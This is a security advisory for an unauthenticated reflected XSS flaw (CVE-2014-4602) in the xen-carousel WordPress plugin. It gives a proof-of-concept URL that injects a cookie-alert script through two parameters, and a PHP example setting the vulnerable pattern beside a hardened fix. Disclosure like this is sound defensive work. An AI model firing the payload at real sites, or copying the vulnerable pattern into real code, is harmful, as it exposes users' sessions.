wp-plugin : xen-carousel – A3-Cross-Site Scripting (XSS)


Plugin Details


Plugin Name : xen-carousel


Affected Version : 0.12.2 (and most probably lower versions, if any)

Vulnerability : A3-Cross-Site Scripting (XSS)
Identified by : Anant Shrivastava


Technical Details


Minimum Level of Access Required : Unauthenticated


PoC (Proof of Concept) :


http://localhost/wp-content/plugins/xen-carousel/xencarousel-admin.js.php?path=path'><script>alert(document.cookie)</script>&ajaxpath=ajaxpath'><script>alert(document.cookie)</script>&


Vulnerable Parameter : path, ajaxpath
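As an added example (not the plugin's code, which this advisory does not reproduce), a hypothetical PHP reconstruction of the bug class beside its hardened form: the parameter names come from the advisory, while the function names and the JS-string output context are assumptions.

```php
<?php
// Added example, not the xen-carousel plugin's source: a hypothetical
// reconstruction of a PHP-generated JavaScript file that copies request
// parameters into its output, next to a hardened version. The parameter
// names follow the advisory; everything else here is assumed.

// VULNERABLE pattern: each value lands inside a JS string literal
// unchanged, so a single quote ends the literal and a "<script>" tag
// becomes markup when a browser renders the response as HTML.
function vulnerable_js(array $get): string
{
    $path     = $get['path'] ?? '';
    $ajaxpath = $get['ajaxpath'] ?? '';
    return "var xenPath = '$path'; var xenAjaxPath = '$ajaxpath';";
}

// Encode one value as a quoted JS literal. The HEX flags turn < > ' " &
// into \uXXXX escapes, so nothing in the value can close the literal or
// open a tag; invalid UTF-8 (json_encode() returns false) becomes "".
function js_literal(string $value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP;
    $encoded = json_encode($value, $flags);
    return $encoded === false ? '""' : $encoded;
}

// HARDENED version: same output shape, but every value goes through
// js_literal(), which supplies its own quotes.
function hardened_js(array $get): string
{
    $path     = js_literal((string) ($get['path'] ?? ''));
    $ajaxpath = js_literal((string) ($get['ajaxpath'] ?? ''));
    return "var xenPath = $path; var xenAjaxPath = $ajaxpath;";
}

if (PHP_SAPI === 'cli') {
    // Offline demo on a constructed value that breaks out of the literal.
    $sample = ['path' => "x'><b>", 'ajaxpath' => 'wp-admin/admin-ajax.php'];
    echo vulnerable_js($sample), PHP_EOL;
    echo hardened_js($sample), PHP_EOL;
} else {
    // Serve the response as JavaScript, never HTML, and forbid MIME sniffing.
    header('Content-Type: application/javascript; charset=utf-8');
    header('X-Content-Type-Options: nosniff');
    echo hardened_js($_GET);
}
// In a WordPress plugin the cleaner fix is to drop the .js.php endpoint
// altogether and pass such values with wp_localize_script(), which emits
// them JSON-encoded alongside the enqueued script.
```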


Disclosure Timeline


Vendor Contacted : 2014-01-17

Plugin Status : Closed
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4602

Plugin Description :
**The balance of form and function.**

Call out sections of your site by easily creating a carousel of images, associated to posts or pages, for display on your home page or anywhere on your site. The carousel purposely does not come styled, but is instead semantically marked up with #IDs and .classes to make it easy for you to integrate it into your theme without much effort.
